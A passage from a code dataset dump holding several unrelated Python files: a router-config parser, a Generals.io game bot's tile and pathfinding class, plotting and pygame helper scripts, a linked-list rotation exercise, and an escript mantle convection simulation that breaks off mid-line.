1])","sub_path":"DigitalSkills2018/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"173189637","text":"#!/usr/bin/env python\n#===============================================================================\n# ReadRouterConfigAll\n# \n# Description:\n# Script to open raw export from Matik?, and process file contents into\n# a router-specific configuration file for each router in the raw file,\n# with respect to the script ReadRouterConfig.py.\n#\n# Version:\n# MM.mm DD/MM/YY\n# 00.00 11/08/17 First version with header description\n# 
00.01 17/04/19 Remove writeToFileFlag from inputs\n#\n# Example/Usage:\n#\n#\n#===============================================================================\n\nfrom archive.FindListofRouters import createRouterListDevs\nfrom archive.ReadRouterConfig import buildConfigRouter\n\nfrom src.WriteFileRtrAssign import writeLogMessage, writePyFile\n\n\ndef buildAllRouterConfigs(printFlag=False):\n # unit TableSimple function;\n \n # open and read in file\n listRouters, fileDevices, dirDevices = createRouterListDevs(printFlag)\n writeLogMessage('Reading data for all routers from: ' + fileDevices, dirDevices)\n \n qtyRouters = len(listRouters)\n \n for i in range(0,qtyRouters):\n \n # parse out Router name from list\n selectRouter = listRouters[i] #'ASHBBBRJ01'\n \n # build router hardware layout list\n try:\n configRouter = buildConfigRouter(fileDevices, selectRouter)[0]\n # write to file\n fileXt = 'pyCFG.txt'\n writePyFile(dirDevices, selectRouter, configRouter, fileXt)\n except FileNotFoundError:\n continue \n \n writeLogMessage('Script complete.', dirDevices)\n \n \ndef main(printFlag=True):\n buildAllRouterConfigs(printFlag)\n\n\nif __name__ == '__main__':\n main()","sub_path":"archive/ReadRouterConfigAll.py","file_name":"ReadRouterConfigAll.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"443889022","text":"\"\"\"\n @ Harris Christiansen (code@HarrisChristiansen.com)\n Generals.io Automated Client - https://github.com/harrischristiansen/generals-bot\n Tile: Objects for representing Generals IO Tiles\n\"\"\"\nfrom collections import deque\nfrom queue import Queue\nimport time\nimport logging\n\nfrom .constants import *\n\n\nclass Tile(object):\n def __init__(self, game_map, x, y):\n # Public Properties\n self.x = x # Integer X Coordinate\n self.y = y # Integer Y Coordinate\n self.tile = TILE_FOG # Integer Tile Type (TILE_OBSTACLE, TILE_FOG, TILE_MOUNTAIN, TILE_EMPTY, or player_ID)\n self.turn_captured = 0 # Integer Turn Tile Last Captured\n self.turn_held = 0 # Integer Last Turn Held\n self.turn_first_seen = 0 # First turn the tile was visible to us\n self.army = 0 # Integer Army Count\n self.is_city = False # Boolean isCity\n self.is_mountain = False # Whether we know whether this space is a city\n self.is_swamp = False # Boolean isSwamp\n self.is_general = False # Boolean isGeneral\n self.is_basic = False # True once we have confirmed there is no general, city, mountain, or swamp here.\n\n # Private Properties\n self._map = game_map # Pointer to Map Object\n self._general_index = -1 # Player Index if tile is a general\n self._dirty_update_time = 0 # Last time Tile was updated by bot, not server\n self._is_main_force = False\n\n self._distances = {}\n\n def __repr__(self):\n return \"(%2d,%2d)[%2d,%3d]\" % (self.x, self.y, self.tile, self.army)\n\n \"\"\"def __eq__(self, other):\n return (other is not None and self.x==other.x and self.y==other.y)\"\"\"\n\n def __lt__(self, other):\n return self.army < other.army\n\n def set_neighbors(self, game_map):\n self._map = game_map\n self._set_neighbors()\n\n def set_is_swamp(self, is_swamp):\n self.is_swamp = is_swamp\n\n def update(self, game_map, tile, army, is_city=False, is_general=False, is_dirty=False):\n self._map = game_map\n\n if is_dirty:\n self._dirty_update_time = time.time()\n\n if self.tile < 0 or tile >= TILE_MOUNTAIN or (tile < TILE_MOUNTAIN and self.is_self()):\n # Tile should be updated\n if (tile >= 0 or self.tile >= 0) and 
self.tile != tile: # Remember Discovered Tiles\n self.turn_captured = game_map.turn\n if self.tile >= 0:\n game_map.tiles[self.tile].remove(self)\n if tile >= 0:\n game_map.tiles[tile].append(self)\n if tile == game_map.player_index:\n self.turn_held = game_map.turn\n self.tile = tile\n if self.army == 0 or army > 0 or tile >= TILE_MOUNTAIN or self.is_swamp: # Remember Discovered Armies\n self.army = army\n\n if tile == TILE_MOUNTAIN:\n self.is_mountain = True\n\n if self.tile == TILE_FOG and tile != TILE_FOG and not is_general:\n self.is_basic = True\n\n if is_city:\n self.is_city = True\n self.is_general = False\n if self not in game_map.cities:\n game_map.cities.append(self)\n if self._general_index != -1 and self._general_index < 8:\n game_map.generals[self._general_index] = None\n self._general_index = -1\n elif is_general:\n self.is_general = True\n game_map.generals[tile] = self\n self._general_index = self.tile\n\n if self.turn_first_seen == 0 and tile not in (TILE_FOG, TILE_OBSTACLE):\n self.turn_first_seen = self._map.turn\n\n if self.tile != self._map.player_index:\n self._is_main_force = False\n\n # ======================== Tile Properties ======================== #\n\n def is_dirty(self):\n return (time.time() - self._dirty_update_time) < 0.6\n\n def distance_to(self, dest):\n if dest is not None:\n if dest not in self._distances:\n self._distances[dest] = abs(self.x - dest.x) + abs(self.y - dest.y)\n return self._distances[dest]\n return 0\n\n def neighbors(self, include_swamps=False, include_cities=True, include_obstacles=False):\n neighbors = []\n for tile in self._neighbors:\n if not tile.is_mountain and \\\n (include_swamps or not tile.is_swamp) and \\\n (include_cities or not tile.is_city) and \\\n (include_obstacles or tile.tile != TILE_OBSTACLE):\n neighbors.append(tile)\n return neighbors\n\n def is_valid_target(self): # Check tile to verify reachability\n if self.tile in (TILE_MOUNTAIN, TILE_FOG, TILE_OBSTACLE):\n # if self.is_mountain:\n return False\n # if self.is_swamp and self.turn_held > 0:\n # return False\n for tile in self.neighbors(include_swamps=True):\n if tile.turn_held > 0:\n return True\n # one way to get here is if there is an empty tile in a separate connected component\n # that is visible at a diagonal. 
Are there other ways to get here?\n return False\n\n def is_empty(self):\n return self.tile == TILE_EMPTY\n\n def is_self(self):\n return self.tile == self._map.player_index\n\n def is_on_team(self):\n return self.tile in self._map.my_team\n\n def is_enemy(self):\n return self.tile >= 0 and not self.is_on_team()\n\n def should_not_attack(self): # DEPRECATED: Use Tile.should_attack\n return not self.should_attack()\n\n def should_attack(self):\n \"\"\"\n Checks that this tile is visible, not a mountain, in my connected component,\n does not belong to a teammate, and is not dirty.\n :return:\n \"\"\"\n if not self.is_valid_target():\n # Target is a mountain or is not verified to be in my connected component.\n return False\n if self.is_on_team():\n return False\n if self.tile in self._map.do_not_attack_players:\n return False\n if self.is_dirty():\n return False\n return True\n\n # ======================== Select Neighboring Tile ======================== #\n\n def neighbor_to_attack(self, path=None):\n if path is None:\n path = []\n if not self.is_self():\n return None\n\n target = None\n for neighbor in self.neighbors(include_swamps=True):\n # if target is None:\n # target = neighbor\n # Move into capturable target Tiles\n if (neighbor.should_attack() and self.army > neighbor.army + 1) or neighbor in path:\n if not neighbor.is_swamp:\n if target is None:\n target = neighbor\n elif neighbor.is_city and (not target.is_city or target.army > neighbor.army) and \\\n (neighbor.unknown_neighbor_count() > 0 or neighbor.army < self.army * 2):\n target = neighbor\n # Special case, prioritize opponents with 1 army over empty tiles\n elif not neighbor.is_empty() and neighbor.army <= 1 and target.is_empty():\n target = neighbor\n elif target.army > neighbor.army and not target.is_city:\n if neighbor.is_empty():\n if target.army > 1:\n target = neighbor\n else:\n target = neighbor\n elif neighbor.turn_held == 0: # Move into swamps that we have never held before\n target = neighbor\n\n return target\n\n # ======================== Select Distant Tile ======================== #\n\n def nearest_tile_in_path(self, path):\n dest = None\n dest_distance = 9999\n for tile in path:\n distance = self.distance_to(tile)\n if distance < dest_distance:\n dest = tile\n dest_distance = distance\n\n return dest\n\n def nearest_target_tile(self):\n if not self.is_self():\n # if the player doesn't own this tile\n return None\n\n max_target_army = self.army * 4 + 14\n\n dest = None\n dest_distance = 9999\n for x in range(self._map.cols): # Check Each Square\n for y in range(self._map.rows):\n tile = self._map.grid[y][x]\n # Non Target Tiles\n if not tile.is_valid_target() or not tile.should_attack() or tile.army > max_target_army:\n continue\n\n distance = self.distance_to(tile)\n if tile.is_general: # Generals appear closer\n distance = distance * 0.09\n elif tile.is_city: # Cities vary distance based on size, but appear closer\n # distance = distance * sorted((0.17, (tile.army / (3.2 * self.army)), 20))[1]\n distance *= 0.3\n\n # if tile.tile == TILE_EMPTY: # Empties appear further away\n # if tile.is_city:\n # distance = distance * 1.6\n # else:\n # distance = distance * 4.3\n\n if tile.army > self.army: # Larger targets appear further away\n distance = distance * (1.6 * tile.army / self.army)\n\n if tile.is_swamp: # Swamps appear further away\n distance = distance * 10 * 9999\n if tile.turn_held > 0: # Swamps which have been held appear even further away\n distance = distance * 3\n\n # Tiles with unknown neighbors appear 
closer\n # distance *= 4 - tile.unknown_neighbor_count() * 1\n # distance *= 4 - tile.unknown_neighbor_count() * 1\n\n if distance < dest_distance: # ----- Set nearest target -----\n dest = tile\n dest_distance = distance\n # if dest is None:\n # print(\"Tile\", self.x, self.y, \": No Targets\")\n # else:\n # print(\"Tile\", self.x, self.y, \": Targeting tile\", dest.x, dest.y,\n # \"Neighbor cnt: \", dest.unknown_neighbor_count(),\n # \"Neighbors: \", [(neighbor.x, neighbor.y, neighbor.tile) for neighbor in dest._neighbors])\n return dest\n\n def unknown_neighbor_count(self):\n return sum(\n 1 for neighbor in self._neighbors\n if neighbor.tile in (TILE_FOG, TILE_OBSTACLE)\n )\n\n # ======================== Pathfinding ======================== #\n\n def path_to(self, dest, include_cities=False, include_obstacles=False):\n if dest is None:\n return []\n\n frontier: Queue[Tile] = Queue()\n frontier.put(self)\n came_from = {self: None}\n army_count = {self: self.army}\n processed = set()\n\n while not frontier.empty():\n current = frontier.get()\n\n if current == dest: # Found Destination\n break\n\n for next in current.neighbors(\n include_swamps=True,\n include_cities=include_cities,\n include_obstacles=include_obstacles,\n ):\n if next not in processed and (next.is_on_team() or next == dest or next.army < army_count[current]):\n # priority = self.distance(next, dest)\n if next not in came_from:\n frontier.put(next)\n if next.is_on_team():\n next_army_count = army_count[current] + (next.army - 1)\n else:\n next_army_count = army_count[current] - (next.army + 1)\n if next not in army_count or next_army_count > army_count[next]:\n army_count[next] = next_army_count\n came_from[next] = current\n\n processed.add(current)\n\n if dest not in came_from: # Did not find dest\n if include_cities:\n return []\n else:\n return self.path_to(dest, include_cities=True)\n\n # Create Path List\n path = _path_reconstruct(came_from, dest)\n\n self._distances[dest] = len(path)\n return path\n\n def get_swamp_paths(self, armies=1e7):\n \"\"\"\n :param armies: number of armies that an adjacent tile is considering sending here\n :return:\n \"\"\"\n swamp_paths = []\n frontier: Queue[Tile] = Queue()\n frontier.put(self)\n came_from = {self: None}\n\n while not frontier.empty():\n current = frontier.get()\n\n for neighbor in current.neighbors(include_swamps=True, include_cities=True, include_obstacles=True):\n if neighbor in came_from:\n continue\n came_from[neighbor] = current\n if neighbor.is_swamp:\n frontier.put(neighbor)\n\n elif not neighbor.is_mountain and not neighbor.is_on_team():\n path = []\n rev_path_current = neighbor\n while rev_path_current is not None:\n path.append(rev_path_current)\n rev_path_current = came_from[rev_path_current]\n if 2 * (len(path) + 1)< armies:\n path.reverse()\n swamp_paths.append(path)\n\n return swamp_paths\n\n def get_best_swamp_path(self):\n swamp_paths = self.get_swamp_paths()\n if not swamp_paths:\n # The swamp is a dead end or we've already explored the other sides\n return []\n # there is a city at the end that I can capture\n capture_paths = [\n path for path in swamp_paths\n if (path[-1].is_city or path[-1].tile == TILE_EMPTY) and\n not path[-1].is_on_team() and\n path[-1].army < self.army - len(path) - 1\n ]\n if capture_paths:\n shortest_path = min(capture_paths, key=len)\n return shortest_path\n # there is something new to see at the end, go for that\n explore_paths = [\n path for path in swamp_paths\n if path[-1].tile in [TILE_FOG, TILE_OBSTACLE] and not 
path[-1].is_mountain\n and len(path) < self.army - 1\n ]\n if explore_paths:\n shortest_path = min(explore_paths, key=len)\n return shortest_path\n\n # otherwise follow any of the other paths\n shortest_path = min(swamp_paths, key=len)\n return shortest_path\n\n def step_toward_me(self):\n largest_tile = self._map.find_largest_tile()\n bfs_queue: deque[Tile] = deque([self])\n processed = set()\n go_next = {self:None}\n opposing_strength = {self:self.army}\n\n while bfs_queue:\n current = bfs_queue.popleft()\n if current == largest_tile:\n return False, False\n if current in processed:\n continue\n for neighbor in current.neighbors(True, True, True):\n if neighbor not in processed:\n if neighbor not in go_next:\n bfs_queue.append(neighbor)\n if neighbor.is_on_team():\n next_opposing_strength = opposing_strength[current] - (neighbor.army + 1)\n else:\n next_opposing_strength = opposing_strength[current] + (neighbor.army + 1) * 1.1\n if neighbor.is_swamp:\n next_opposing_strength += 1\n if neighbor not in opposing_strength or next_opposing_strength < opposing_strength[neighbor]:\n opposing_strength[neighbor] = next_opposing_strength\n go_next[neighbor] = current\n if next_opposing_strength < 0 and neighbor.is_self():\n return neighbor, current\n processed.add(current)\n\n return False, False\n\n # ======================== PRIVATE FUNCTIONS ======================== #\n\n def _set_neighbors(self):\n x = self.x\n y = self.y\n\n neighbors = []\n for dy, dx in DIRECTIONS:\n if self._map.is_valid_position(x + dx, y + dy):\n tile = self._map.grid[y + dy][x + dx]\n neighbors.append(tile)\n\n self._neighbors = neighbors\n return neighbors\n\n # ========================== PROPERTIES ============================ #\n\ndef _path_reconstruct(came_from, dest):\n current = dest\n path = [current]\n try:\n while came_from[current] is not None:\n current = came_from[current]\n path.append(current)\n except KeyError:\n pass\n path.reverse()\n\n return path\n","sub_path":"base/client/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":16986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"231121517","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef visualize_loss(train_loss_1, test_loss_1, init_name_1, train_loss_2, test_loss_2, init_name_2):\n x_axis = list(range(1, len(train_loss_1)+1))\n\n fig, ax = plt.subplots()\n ax.plot(x_axis, train_loss_1, color=(1.0, 0.0, 0.0))\n ax.plot(x_axis, train_loss_2, color=(0.0, 1.0, 0.0))\n ax.plot(x_axis, test_loss_1, color=(0.0, 0.0, 1.0))\n ax.plot(x_axis, test_loss_2, color=(0.33, 0.33, 0.33))\n ax.set(xlabel='epochs', ylabel='loss',\n title=\"Compare Init Methods Loss\")\n ax.grid()\n plt.legend([init_name_1 + \" - train_loss\", init_name_2 + \" - train_loss\", init_name_1 + \" - test_loss\", init_name_2 + \" - test_loss\"])\n\n fig.savefig(\"statistics/results/initialization/loss.png\")\n plt.close(fig)\n\ndef visualize_acc(train_acc_1, test_acc_1, init_name_1, train_acc_2, test_acc_2, init_name_2):\n x_axis = list(range(1, len(train_acc_1)+1))\n\n fig, ax = plt.subplots()\n ax.plot(x_axis, train_acc_1, color=(1.0, 0.0, 0.0))\n ax.plot(x_axis, train_acc_2, color=(0.0, 1.0, 0.0))\n ax.plot(x_axis, test_acc_1, color=(0.0, 0.0, 1.0))\n ax.plot(x_axis, test_acc_2, color=(0.33, 0.33, 0.33))\n ax.set(xlabel='epochs', ylabel='acc',\n title=\"Compare Init Methods Accuracy\")\n ax.grid()\n plt.legend([init_name_1 + \" - train_acc\", init_name_2 + \" - train_acc\", init_name_1 + \" - 
test_acc\", init_name_2 + \" - test_acc\"])\n\n fig.savefig(\"statistics/results/initialization/acc.png\")\n plt.close(fig)\n\nif __name__ == \"__main__\":\n normal_stats = np.load(\"statistics/results/initialization/results/random_init_stats.npy\", allow_pickle=True)\n xavier_stats = np.load(\"statistics/results/initialization/results/xavier_init_stats.npy\", allow_pickle=True)\n\n normal_train_loss, normal_test_loss, normal_train_acc, normal_test_acc = normal_stats\n xavier_train_loss, xavier_test_loss, xavier_train_acc, xavier_test_acc = xavier_stats\n\n visualize_loss(normal_train_loss, normal_test_loss, \"Normal\", xavier_train_loss, xavier_test_loss, \"Xavier\")\n visualize_acc(normal_train_acc, normal_test_acc, \"Normal\", xavier_train_acc, xavier_test_acc, \"Xavier\")\n\n","sub_path":"EX1/Q3/statistics/visualize_initialization_statistics.py","file_name":"visualize_initialization_statistics.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"196270614","text":"import pygame\n\ndef init():\n pygame.init()\n basicset = pygame.display.set_mode((400, 400))\n\ndef keyPressed(keyName):\n feedback = False\n for eve in pygame.event.get(): pass\n keyInput = pygame.key.get_pressed()\n myKey = getattr(pygame, 'K_{}'.format(keyName))\n if keyInput[myKey]:\n feedback = True\n pygame.display.update()\n return feedback\n\ndef main():\n if keyPressed(\"h\"):\n print(\"statusOK\")\n\nif __name__ == '__main__':\n init()\n while True:\n main()","sub_path":"PYTHON-DRONE/KeyBoardsetting.py","file_name":"KeyBoardsetting.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"461114948","text":"# 61\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef rotateRight(head, k):\n if not head:\n return None\n if not head.next:\n return head\n # 将链表连成环\n tail = head\n n = 1\n while tail.next:\n tail = tail.next\n n += 1\n tail.next = head\n\n # 找到新的表头表尾并断开链表\n new_tail = head\n for _ in range(n - k % n - 1):\n new_tail = new_tail.next\n new_head = new_tail.next\n new_tail.next = None\n return new_head \n\n\nhead = ListNode(1)\nhead.next = h2 = ListNode(2)\nh2.next = h3 = ListNode(3)\nh3.next = h4 = ListNode(4)\nh4.next = h5 = ListNode(5)\n\n\ntemp = rotateRight(head, 7)\nfor i in range(5):\n print(temp.val)\n temp = temp.next\n\n","sub_path":"algorithm/leetcode/链表类型题/旋转链表.py","file_name":"旋转链表.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"527489833","text":"##############################################################################\n#\n# Copyright (c) 2003-2018 by The University of Queensland\n# http://www.uq.edu.au\n#\n# Primary Business: Queensland, Australia\n# Licensed under the Apache License, version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Development until 2012 by Earth Systems Science Computational Center (ESSCC)\n# Development 2012-2013 by School of Earth Sciences\n# Development from 2014 by Centre for Geoscience Computing (GeoComp)\n#\n##############################################################################\n\"\"\"\nthis is a convection simulation over a domain [0,L] X [0,L] x [0,H]\n\nIt is solved in dimensionless form\n\n\"\"\"\n\nfrom __future__ import print_function, division\n\n__copyright__=\"\"\"Copyright (c) 2003-2018 by The University of 
Queensland\nhttp://www.uq.edu.au\nPrimary Business: Queensland, Australia\"\"\"\n__license__=\"\"\"Licensed under the Apache License, version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\"\"\"\n__url__=\"https://launchpad.net/escript-finley\"\n\nfrom esys.escript import *\nfrom esys.escript import DataManager as DM\nfrom esys.escript.models import TemperatureCartesian, IncompressibleIsotropicFlowCartesian, Mountains, SubSteppingException\nfrom esys.finley import Rectangle, Brick, LoadMesh\nfrom optparse import OptionParser\nfrom math import pi, ceil\nimport sys\nimport time\n\n# ============================= Default Values ===============================\n\nDIM=2 # spatial dimension\nH=1. # height\nL=2*H # length\nNE=30 # number of elements in H-direction\nPERT=0.15 # initial temperature perturbation\nDT=1.e-4 # initial time step size\nCREATE_TOPO=False # create topography\nDT_MIN=1.e-10 # minimum time step size\nT_END=10. # end time\n\nRHO_0=100. # surface density (lf ~ RHO_0**2) \nG=1. # gravitational constant\nALPHA_0=0.1 # thermal expansion coefficient (Ra ~ RHO_0**2 * ALPHA_0 = lf * ALPHA_0)\nT_0=0. # surface temperature\nT_1=1. # bottom temperature\nC_P=1 # heat capacity\nK=1. # thermal conductivity\nCHI=0. # Taylor-Quinny coefficient\nMUE=None # elastic shear modulus\nTAU_Y=5*10**(2.5) # Drucker-Prager cohesion factor\nBETA=0 # Drucker-Prager friction factor\nTAU_0=2*10**(2.5) # transition stress\nN=3 # power for power law\n\nE=23*0 # activation energy\nV=18*0 # activation volume \nT_OFFSET=1 # temperature offset on surface (dimensionless formulation T_OFFSET=1 otherwise =0)\nR=1 # gas constant\nETA_N0=1. # viscosity at surface \n\nTOPO_SMOOTH=1e-5 # smoothing factor for extrapolation of surface velocity to interior\nT_TOL=1.e-4 # tolerance temperature transport\nFLOW_TOL=1.e-3 # tolerance for inconcompressible flow solver\nTOPO_TOL=0.1 # tolerance for update of topography\nDIAGNOSTICS_FN=\"diag.csv\" # filename for diagnostics\nVERBOSE=False # output more messages from solvers\nDT_VIS=T_END/500 # time difference between visualization files\nDN_VIS=5 # max. number of steps between visualization files\nDN_RESTART=1000 # create restart files every DN_RESTART steps\nPREFIX_RESTART=\"restart\" # name prefix for restart directories\nTOPO_ITER_MAX=20 # max. number of iteration steps to update topography\n\n# ============================================================================\n\n#\n# read options:\n#\nparser = OptionParser(usage=\"%prog [Options]\")\nparser.add_option(\"-r\", \"--restart\", dest=\"restart\",\n help=\"restart from latest checkpoint directory. 
It will be deleted after new data is exported.\", default=False, action=\"store_true\")\nparser.add_option(\"-d\", \"--dir\", dest=\"restart_dir\",\n help=\"locate/create restart directories under DIR.\", metavar=\"DIR\", default='.')\nparser.add_option(\"-p\", \"--param\", dest=\"param\",\n help=\"name of file to be imported \", metavar=\"PARAM\", default=None)\n(options, args) = parser.parse_args()\nrestart=options.restart\n\n#\n# overwrite the default options:\n#\nprint((\"<%s> Execution started.\"%time.asctime()))\nif options.param !=None: \n exec(open(options.param,'r').read())\n print((\"Parameters imported from file \",options.param))\n\nprint(\"Input Parameters:\")\nprint((\"\\tDimension DIM\\t\\t= %d\"%DIM))\nprint((\"\\tHeight H\\t\\t\\t= %s\"%H))\nprint((\"\\tLength L\\t\\t\\t= %s\"%L))\nprint((\"\\tElements in H NE\\t\\t= %d\"%NE))\nprint((\"\\tTemperature perturbation PERT\\t\\t= %s\"%PERT))\nprint((\"\\tInitial time step size DT\\t\\t= %s\"%DT))\nprint((\"\\tMinimum time step size DT_MIN\\t\\t= %s\"%DT_MIN))\nprint((\"\\tEnd time T_END\\t\\t= %s\"%T_END))\nprint((\"\\tCreate topography CREATE_TOPO\\t= %s\"%CREATE_TOPO))\nprint((\"\\tSurface density RHO_0\\t\\t= %s\"%RHO_0))\nprint((\"\\tGravitational constant G\\t\\t\\t= %s\"%G))\nprint((\"\\tThermal expansion coefficient ALPHA_0\\t\\t= %s\"%ALPHA_0))\nprint((\"\\tSurface temperature T_0\\t\\t= %s\"%T_0))\nprint((\"\\tBottom temperature T_1\\t\\t= %s\"%T_1))\nprint((\"\\tHeat capacity C_P\\t\\t= %s\"%C_P))\nprint((\"\\tThermal conductivity K\\t\\t\\t= %s\"%K))\nprint((\"\\tTaylor-Quinny coefficient CHI\\t\\t= %s\"%CHI))\nprint((\"\\tElastic shear modulus MUE\\t\\t= %s\"%MUE))\nprint((\"\\tCohesion factor TAU_Y\\t\\t= %s\"%TAU_Y))\nprint((\"\\tFriction factor BETA\\t\\t= %s\"%BETA))\nprint((\"\\tTransition stress TAU_0\\t\\t= %s\"%TAU_0))\nprint((\"\\tPower for power law N\\t\\t\\t= %s\"%N))\nprint((\"\\tViscosity at surface ETA_N0\\t\\t= %s\"%ETA_N0))\nprint((\"\\tActivation energy E\\t\\t\\t= %s\"%E))\nprint((\"\\tActivation volume V\\t\\t\\t= %s\"%V))\nprint((\"\\tTemperature offset T_OFFSET\\t\\t= %s\"%T_OFFSET))\nprint((\"\\tGas constant R\\t\\t\\t= %s\"%R))\nprint((\"\\tTopography smoothing TOPO_SMOOTH\\t= %s\"%TOPO_SMOOTH))\nprint((\"\\tTolerance for topography TOPO_TOL\\t\\t= %s\"%TOPO_TOL))\nprint((\"\\tTransport tolerance T_TOL\\t\\t= %s\"%T_TOL))\nprint((\"\\tFlow tolerance FLOW_TOL\\t\\t= %s\"%FLOW_TOL))\n#print(\"\\tFile for diagnostics DIAGNOSTICS_FN\\t= %s\"%DIAGNOSTICS_FN)\nprint((\"\\tRestart counter increment DN_RESTART\\t= %d\"%DN_RESTART))\nprint((\"\\tPrefix for restart dirs PREFIX_RESTART\\t= %s\"%PREFIX_RESTART))\nprint((\"\\tVerbosity VERBOSE\\t\\t= %s\"%VERBOSE))\n\nprint(\"Control Parameters:\")\nt_REF=RHO_0*C_P*H**2/K\nP_REF=ETA_N0/t_REF\nAr=E/R/(T_1-T_0)\nif E>0 and V>0:\n V_REF=P_REF*V/E\nelse:\n V_REF=0\nT_OFFSET_REF=T_OFFSET/(T_1-T_0)\nRa=RHO_0*G*H*(T_1-T_0)*ALPHA_0/P_REF\nDi=ALPHA_0*G*H/C_P\nCHI_REF=CHI*K*ETA_N0/(RHO_0**2*C_P**2*(T_1-T_0)*H**2)\nif CREATE_TOPO:\n SURFACE_LOAD=RHO_0*G*H/P_REF\nelse:\n SURFACE_LOAD=0.\nif MUE == None:\n De=None\nelse:\n De=ETA_N0/MUE/t_REF\nETA_BOT=exp(Ar*((1.+V_REF)/(T_OFFSET_REF+1)-1./T_OFFSET_REF))*ETA_N0\nprint((\"\\tTotal #elements \\t\\t\\t= %d\"%(NE**DIM*int(L/H)**(DIM-1))))\nprint((\"\\tReference time t_REF\\t\\t= %s\"%t_REF))\nprint((\"\\tReference pressure P_REF\\t\\t= %s\"%P_REF))\nprint((\"\\tReference Taylor-Quinny CHI_REF\\t\\t= %s\"%CHI_REF))\nprint((\"\\tDissipation number DI\\t\\t= %s\"%Di))\nprint((\"\\tRayleigh number surface Ra\\t\\t= 
%s\"%Ra))\nprint((\"\\tDebora number surface De\\t\\t= %s\"%De))\nprint((\"\\tBottom viscosity \\t\\t\\t= %s\"%ETA_BOT))\nprint((\"\\tRayleigh number bottom \\t\\t\\t= %s\"%(RHO_0*G*H*(T_1-T_0)*ALPHA_0*t_REF/ETA_BOT)))\nif MUE == None:\n print(\"\\tDebora number bottom \\t\\t\\t= None\")\nelse:\n print((\"\\tDebora number bottom \\t\\t\\t= %s\"%(ETA_BOT/MUE/t_REF)))\nprint((\"\\tArrhenius Ar\\t\\t= %s\"%Ar))\nprint((\"\\tSurface load factor SURFACE_LOAD\\t= %s\"%SURFACE_LOAD))\nprint((\"\\tScaled activation volume V_REF\\t\\t= %s\"%V_REF))\nprint()\n\n# some control variables (will be overwritten in case of a restart:\nt=0 # time stamp\nn=0 # time step counter\nt_vis=DT_VIS # time of next visualization file export\ndt=DT # current time step size\n#=========================\n#\n# set up domain and data from scratch or from restart files\n#\ndataMgr=DM(formats=[DM.RESTART,DM.VTK], work_dir=options.restart_dir, restart_prefix=PREFIX_RESTART, do_restart=restart)\ndataMgr.setCheckpointFrequency(DN_RESTART/DN_VIS)\nif dataMgr.hasData():\n dom=dataMgr.getDomain()\n t=dataMgr.getValue('t')\n t_vis=dataMgr.getValue('t_vis')\n n=dataMgr.getValue('n')\n dt=dataMgr.getValue('dt')\n stress=dataMgr.getValue('stress')\n v=dataMgr.getValue('v')\n p=dataMgr.getValue('p')\n T=dataMgr.getValue('T')\n if CREATE_TOPO:\n topography=dataMgr.getValue('topography')\n \n #diagnostics_file=FileWriter(DIAGNOSTICS_FN,append=True)\n print((\"<%s> Restart at time step %d (t=%e) completed.\"%(time.asctime(),n,t)))\nelse:\n if DIM==2:\n dom=Rectangle(int(ceil(L*NE/H)),NE,l0=L/H,l1=1,order=-1,optimize=True)\n else:\n dom=Brick(int(ceil(L*NE/H)),int(ceil(L*NE/H)),NE,l0=L/H,l1=L/H,l2=1,order=-1,optimize=True)\n x=dom.getX()\n T=Scalar(1,Solution(dom))\n for d in range(DIM):\n if d == DIM-1: \n T*=sin(x[d]/H*pi)\n else:\n T*=cos(x[d]/L*pi)\n\n T=(1.-x[DIM-1])+PERT*T\n v=Vector(0,Solution(dom))\n stress=Tensor(0,Function(dom))\n x2=ReducedSolution(dom).getX()\n p=Ra*(x2[DIM-1]-0.5*x2[DIM-1]**2-0.5)\n\n if CREATE_TOPO:\n topography=Scalar(0.,Solution(dom))\n #diagnostics_file=FileWriter(DIAGNOSTICS_FN,append=False)\n #diagnostics_file.write(\"Ra = %e Lambda= %e\\n\"%(Ra, SURFACE_LOAD))\n\np_last=p\nx=dom.getX()\n#\n# set up heat problem:\n#\nheat=TemperatureCartesian(dom)\nprint((\"<%s> Temperature transport has been set up.\"%time.asctime()))\nheat.getSolverOptions().setTolerance(T_TOL)\nheat.getSolverOptions().setVerbosity(VERBOSE)\nfixed_T_at=whereZero(x[DIM-1])+whereZero(H-x[DIM-1])\nheat.setInitialTemperature(clip(T,T_0))\nheat.setValue(rhocp=1,k=1,given_T_mask=fixed_T_at)\n#\n# velocity constraints:\n#\nfixed_v_mask=Vector(0,Solution(dom))\nfaces=Scalar(0.,Solution(dom))\nfor d in range(DIM):\n if d == DIM-1: \n ll = H\n else:\n ll = L\n if CREATE_TOPO and d==DIM-1:\n fixed_v_mask+=whereZero(x[d])*unitVector(d,DIM)\n else:\n s=whereZero(x[d])+whereZero(x[d]-ll)\n faces+=s\n fixed_v_mask+=s*unitVector(d,DIM)\n#\n# set up velocity problem\n#\nflow=IncompressibleIsotropicFlowCartesian(dom, stress=stress, v=v, p=p, t=t, numMaterials=2, verbose=VERBOSE)\nflow.setDruckerPragerLaw(tau_Y=TAU_Y/P_REF+BETA*(1.-Function(dom).getX()[DIM-1]))\n\nflow.setElasticShearModulus(MUE)\nflow.setTolerance(FLOW_TOL)\nflow.setEtaTolerance(FLOW_TOL)\nflow.setExternals(fixed_v_mask=fixed_v_mask)\nprint((\"<%s> Flow solver has been set up.\"%time.asctime()))\n#\n# topography setup\n#\nboundary=FunctionOnBoundary(dom).getX()[DIM-1]\ntop_boundary_mask=whereZero(boundary-sup(boundary))\nsurface_area=integrate(top_boundary_mask)\nif CREATE_TOPO:\n 
